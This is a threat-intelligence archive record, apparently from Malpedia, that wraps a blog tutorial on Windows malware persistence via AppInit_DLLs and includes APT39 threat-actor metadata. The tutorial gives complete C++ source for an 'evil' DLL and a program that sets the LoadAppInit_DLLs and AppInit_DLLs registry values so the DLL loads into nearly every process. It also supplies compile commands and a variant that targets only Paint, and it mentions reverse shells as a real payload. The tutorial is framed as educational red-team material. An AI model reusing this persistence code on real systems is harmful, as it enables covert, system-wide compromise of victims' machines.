{
	"id": "0f617af3-688d-48f1-ae8f-2d240541d064",
	"created_at": "2026-04-06T00:14:26.759902Z",
	"updated_at": "2026-04-10T03:35:13.652041Z",
	"deleted_at": null,
	"sha1_hash": "2eceb6224e2cba5369d5a970f436c952bc390b47",
	"title": "Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1916539,
	"plain_text": "Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.\r\nBy cocomelonc\r\nPublished: 2022-05-16 · Archived: 2026-04-05 13:49:32 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis post is the next part of a series of articles on Windows malware persistence techniques and tricks.\r\nToday I’ll write about the result of my own research into another persistence trick: AppInit_DLLs.\r\nWindows operating systems have the functionality to allow nearly all application processes to load custom DLLs into their address space. This allows for the possibility of persistence, as any DLL may be loaded and executed when application processes are created on the system.\r\nAppInit DLLs\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\nPage 1 of 11\r\nAdministrator level privileges are necessary to implement this trick. The following registry keys regulate the loading of DLLs via AppInit:\r\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows - 32-bit\r\nHKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows - 64-bit\r\nWe are interested in the following values:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nAnd for 64-bit:\r\nreg query \"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nTo protect Windows users from malware, Microsoft has disabled the loading of DLLs via AppInit by default (LoadAppInit_DLLs). However, setting the registry value LoadAppInit_DLLs to 1 enables this feature.\r\npractical example\r\nFirst of all, create an “evil” DLL. 
As usual, I will take the “meow-meow” message box pop-up logic:\r\n/*\r\nevil.cpp\r\ninject via Appinit_DLLs\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\nextern \"C\" {\r\n  __declspec(dllexport) BOOL WINAPI runMe(void) {\r\n    MessageBoxA(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n    return TRUE;\r\n  }\r\n}\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n  switch (nReason) {\r\n    case DLL_PROCESS_ATTACH:\r\n      runMe();\r\n      break;\r\n    case DLL_PROCESS_DETACH:\r\n      break;\r\n    case DLL_THREAD_ATTACH:\r\n      break;\r\n    case DLL_THREAD_DETACH:\r\n      break;\r\n  }\r\n  return TRUE;\r\n}\r\nLet’s compile it:\r\nx86_64-w64-mingw32-gcc -shared -o evil.dll evil.cpp -fpermissive\r\nThen the logic is simple: change the registry value AppInit_DLLs to contain the path to the DLL; as a result, evil.dll will be loaded.\r\nFor this, create another app, pers.cpp:\r\n/*\r\npers.cpp\r\nwindows low level persistence via Appinit_DLLs\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstring.h\u003e\r\nint main(int argc, char* argv[]) {\r\n  HKEY hkey = NULL;\r\n  // malicious DLL\r\n  const char* dll = \"Z:\\\\2022-05-16-malware-pers-5\\\\evil.dll\";\r\n  // activation\r\n  DWORD act = 1;\r\n  // 32-bit and 64-bit\r\n  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\", 0, KEY_WRITE, \u0026hkey);\r\n  if (res == ERROR_SUCCESS) {\r\n    // create new registry values (the REG_SZ size includes the terminating null)\r\n    RegSetValueEx(hkey, (LPCSTR)\"LoadAppInit_DLLs\", 0, REG_DWORD, (const BYTE*)\u0026act, sizeof(act));\r\n    RegSetValueEx(hkey, (LPCSTR)\"AppInit_DLLs\", 0, REG_SZ, (const BYTE*)dll, strlen(dll) + 1);\r\n    RegCloseKey(hkey);\r\n  }\r\n  res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)\"SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\", 0, KEY_WRITE, \u0026hkey);\r\n  if (res == ERROR_SUCCESS) {\r\n    // create new registry values\r\n    RegSetValueEx(hkey, (LPCSTR)\"LoadAppInit_DLLs\", 0, REG_DWORD, (const BYTE*)\u0026act, sizeof(act));\r\n    RegSetValueEx(hkey, (LPCSTR)\"AppInit_DLLs\", 0, REG_SZ, (const BYTE*)dll, strlen(dll) + 1);\r\n    RegCloseKey(hkey);\r\n  }\r\n  return 0;\r\n}\r\nAs you can see, setting the registry value LoadAppInit_DLLs to 1 is also important.\r\nLet’s compile it:\r\nx86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-s\r\ndemo\r\nLet’s see everything in action! Drop everything onto the victim’s machine (Windows 10 x64 in my case).\r\nThen run it as Administrator, and check:\r\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nreg query \"HKLM\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /s\r\nThen, for demonstration, open something like Paint or Notepad:\r\nSo, everything worked perfectly :)\r\nsecond example\r\nHowever, this method’s implementation may result in stability and performance difficulties on the target system:\r\nFurthermore, I think the logic of the first DLL is very odd, since multiple message boxes pop up, so when we perform real-life actions in red team scenarios it’s very noisy, for example with multiple reverse shell connections.\r\nI tried updating the logic of evil.dll a little bit:\r\n/*\r\nevil2.cpp\r\ninject via Appinit_DLLs - only for `mspaint.exe`\r\nauthor: @cocomelonc\r\nhttps://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html\r\n*/\r\n#include \u003cwindows.h\u003e\r\n#pragma comment (lib, \"user32.lib\")\r\n// minimal strstr replacement: returns a pointer to the first occurrence of substr in str, or NULL\r\nchar* subStr(char *str, char *substr) {\r\n  while (*str) {\r\n    char *Begin = str;\r\n    char *pattern = substr;\r\n    while (*str \u0026\u0026 *pattern \u0026\u0026 *str == *pattern) {\r\n      str++;\r\n      pattern++;\r\n    }\r\n    if (!*pattern)\r\n      return Begin;\r\n    str = Begin + 1;\r\n  }\r\n  return NULL;\r\n}\r\nextern \"C\" {\r\n  __declspec(dllexport) BOOL WINAPI runMe(void) {\r\n    MessageBoxA(NULL, \"Meow-meow!\", \"=^..^=\", MB_OK);\r\n    return TRUE;\r\n  }\r\n}\r\nBOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {\r\n  char path[MAX_PATH];\r\n  switch (nReason) {\r\n    case DLL_PROCESS_ATTACH:\r\n      // path of the host process executable that loaded this DLL\r\n      GetModuleFileName(NULL, path, MAX_PATH);\r\n      if (subStr(path, (char *)\"paint\")) {\r\n        runMe();\r\n      }\r\n      break;\r\n    case DLL_PROCESS_DETACH:\r\n      break;\r\n    case DLL_THREAD_ATTACH:\r\n      break;\r\n    case DLL_THREAD_DETACH:\r\n      break;\r\n  }\r\n  return TRUE;\r\n}\r\nAs you can see, if the current process is Paint (and is 32-bit), then “inject” :)\r\nPerfect! :)\r\nFor cleanup, after the end of the experiments:\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v LoadAppInit_DLLs /d 0\r\nreg add \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\" /v AppInit_DLLs /t REG_SZ /f\r\nThis technique is not new, but it is worth paying attention to: in the wild, this trick has often been used by groups such as APT 39 and malware such as Ramsay.\r\nMITRE ATT\u0026CK: APPInit_DLLs\r\nAPT39\r\nRamsay\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time, happy hacking and goodbye!\r\nPS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html"
	],
	"report_names": [
		"malware-pers-5.html"
	],
	"threat_actors": [
		{
			"id": "62947fad-14d2-40bf-a721-b1fc2fbe5b5d",
			"created_at": "2025-08-07T02:03:24.741594Z",
			"updated_at": "2026-04-10T02:00:03.653394Z",
			"deleted_at": null,
			"main_name": "COBALT HICKMAN",
			"aliases": [
				"APT39 ",
				"Burgundy Sandstorm ",
				"Chafer ",
				"ITG07 ",
				"Remix Kitten "
			],
			"source_name": "Secureworks:COBALT HICKMAN",
			"tools": [
				"MechaFlounder",
				"Mimikatz",
				"Remexi",
				"TREKX"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bee22874-f90e-410b-93f3-a2f9b1c2e695",
			"created_at": "2022-10-25T16:07:23.45097Z",
			"updated_at": "2026-04-10T02:00:04.610108Z",
			"deleted_at": null,
			"main_name": "Chafer",
			"aliases": [
				"APT 39",
				"Burgundy Sandstorm",
				"Cobalt Hickman",
				"G0087",
				"ITG07",
				"Radio Serpens",
				"Remix Kitten",
				"TA454"
			],
			"source_name": "ETDA:Chafer",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Antak",
				"CACHEMONEY",
				"EternalBlue",
				"HTTPTunnel",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"MechaFlounder",
				"Metasploit",
				"Mimikatz",
				"NBTscan",
				"NSSM",
				"Non-sucking Service Manager",
				"POWBAT",
				"Plink",
				"PuTTY Link",
				"Rana",
				"Remcom",
				"Remexi",
				"RemoteCommandExecution",
				"SafetyKatz",
				"UltraVNC",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"nbtscan",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1b3a247f-6186-4482-8b92-c3fb2d767c7d",
			"created_at": "2023-01-06T13:46:38.883911Z",
			"updated_at": "2026-04-10T02:00:03.132231Z",
			"deleted_at": null,
			"main_name": "APT39",
			"aliases": [
				"COBALT HICKMAN",
				"G0087",
				"Radio Serpens",
				"TA454",
				"ITG07",
				"Burgundy Sandstorm",
				"REMIX KITTEN"
			],
			"source_name": "MISPGALAXY:APT39",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6b6155e4-94ec-4909-b908-550afe758ad6",
			"created_at": "2022-10-25T15:50:23.365074Z",
			"updated_at": "2026-04-10T02:00:05.2978Z",
			"deleted_at": null,
			"main_name": "APT39",
			"aliases": [
				"APT39",
				"ITG07",
				"Remix Kitten"
			],
			"source_name": "MITRE:APT39",
			"tools": [
				"NBTscan",
				"MechaFlounder",
				"Remexi",
				"CrackMapExec",
				"pwdump",
				"Mimikatz",
				"Windows Credential Editor",
				"Cadelspy",
				"PsExec",
				"ASPXSpy",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434466,
	"ts_updated_at": 1775792113,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.pdf",
		"text": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.txt",
		"img": "https://archive.orkl.eu/2eceb6224e2cba5369d5a970f436c952bc390b47.jpg"
	}
}